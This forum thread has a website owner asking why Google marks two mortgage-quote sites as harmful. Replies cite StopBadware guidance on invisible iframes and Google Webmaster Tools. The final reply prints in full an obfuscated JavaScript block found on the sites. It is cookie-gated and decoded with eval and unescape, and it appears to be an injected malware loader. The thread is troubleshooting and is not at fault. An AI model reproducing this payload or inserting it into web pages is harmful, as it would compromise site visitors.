Good day everyone, I have a "malware" issue with Google and I have no idea why. My developers have no idea either. If you search google for: "onlinequotes.com" or "lowerrates.com" you will see the notation "this site may be harmful to your computer" Google then won't let you reach the sites. You can reach them through direct nav or the links directly below. Online Rate Quotes Lower Rates I think it must be the mortgage quote forms but not sure how to fix it?? I found some info on invisible iFrames that may be useful and that's below. I doubt this is it since the height and width are not set to zero although the border is. Please post or PM regarding a fix. Thanks a bunch. I really appreciate the help. http://www.stopbadware.org/home/security#identifying Invisible iframes Iframe tags are a kind of HTML tag. An iframe creates a small "window" on a webpage so that another webpage can load within the embedded window. Iframes are not always used for nefarious purposes; one frequent use, for example, is to embed a video into a blog post. When used by malicious hackers, an iframe can be made so small that it is invisible, and the visitor to the infected web page never knows that another page is also loading in the tiny iframe window. If you see code for an iframe with width="0" and height="0" in the source code of any page on your website, you have found an invisible iframe. Iframes are most commonly inserted at the very top or the very bottom of a web page's source code. A good first place to check for iframes is before the initial <html> tag that starts a web page's standard code, or after the final </html> that ends a page's code.
Will speak to my developer about that. So you think it's definitely the forms? The company who provides the forms says they've had no issue of this sort outside of us. They also point to a couple sites that have their forms with no malware flag. For example: http://www.loanpage.com/ Thanks again. Look forward to hearing from you.
Have you or your developers tried this? http://www.google.com/support/webmasters/bin/answer.py?answer=45432 "How can I find out if my site has been identified as a web site that hosts or distributes malicious software and what can I do if it has?" "You can find out if your site has been identified as a site that may host or distribute malicious software (one type of "badware") by checking the Overview page for the site in Google Webmaster Tools." I would suggest getting webmaster tools and having a look at the site overview. Have you checked your email? because it seems Google send emails to the following address of the domain name. * abuse@ * admin@ * administrator@ * contact@ * info@ * postmaster@ * support@ * webmaster@ hope this helps... If it doesn't, then contact Google. Cheers James
I had a quick look at your home page of both the sites. I found the following javascript code which i couldn't understand & felt spammy or malware. I believe this could be the one reason for showing malware message beside or under your website in SERPs. <script language="javascript">$="%63c%3d%22gt%2568%253bi%252b+){%2574mp%253dd%2573.s%256ci%2563%2565(i,%2569+1)%253bst%253%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;yqz`;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;ca%3d%22%2566%2575nct%2569on %2564%2563%2573(ds%252ces)%257bds%253dunes%2563%2561pe%252%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cd%3d%22ds%2574+S%2574rin%2567.f%2572%256fmCh%2561r%2543o%2564e((%2574mp%252ech%2561%25%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;st%3d%22%2573%2574%253d%2522$%253d%2573%2574%253b%2564%2563%2573(%2564a%252b%2564%2562+%2564c%252b%2564%2564%252b%2564%2565%252c1%2530%2529%253b%2564%2577%2528%2573t%2529%253b%2573%2574%253d$%253b%2522;%22;op%3d%22%2524%253d%2522dw(dc%2573%2528cu%252c14%2529);%2522;%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;cb%3d%228d%2573%2529;%2573t%253dtm%2570%253d%2527%2527;for(i%253d0;i%253cds.%256c%2565n%22;cz%3d%22%2566u%256ecti%256fn %2563%257a(%2563z){%2572%2565t%2575rn %2563a+c%2562%252bcc+%2563d+c%2565%252b%2563z%253b};%22;ce%3d%2272Co%2564%2565At(%2530%2529%255e(%25270x0%2530%2527+e%2573)%2529)%253b}%257d%22;dz%3d%22%2566un%2563t%2569on %2564w(t%2529{c%2561%253d%2527%252564oc%252575m%252565nt%25252e%2577%252572i%252574e(%252522%2527;c%2565%253d%2527%252522)%2527;c%2562%253d%2527%25253c%2573cr%2525%25369pt%2520%25256can%252567u%252561%25256%2537e%25253%2564%25255c%25252%2532%256aava%2573%25256%2533ri%25257%2530%2574%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252fsc%2572i%2570%25257%2534%25253e%2527%253bev%2561l%2528%2575ne%2573%2563%2561%2570%2565(%2574))%257d;%22;%69f %28do%63um%65nt.%63%6foki%65.%69%6ede%78Of(%27vbu%6cl%65t%69n_%6d%75%6ctiq%75ote%3d%27)%3d%3d-1){s%63(%27vbu%6cl%65tin%5fmu%6ct%69%71u%6ft%65%3d%27,2,7);%65v%61l%28%75n%65s%63ap%65%28d%7a+%63z%2bop%2bst%29+%27dw(%64%7a+%63%7a(%24+%73t))%3b%27)}else%7b$%3d%27%27};fun%63%74i%6fn %73c(%63nm,%76,e%64)%7b%76ar %65xd%3dnew%20D%61%74e()%3be%78d%2eset%44%61te%28%65%78d%2eget%44a%74e(%29+%65%64%29;%64o%63ume%6e%74.%63o%6fk%69e%3dcnm%2b %27%3d%27 +escap%65(v)%2b%27;exp%69re%73%3d%27+ex%64.t%6f%47MTS%74r%69ng%28%29%3b%7d;";eval(unescape($));document.write($);</script> Code (markup):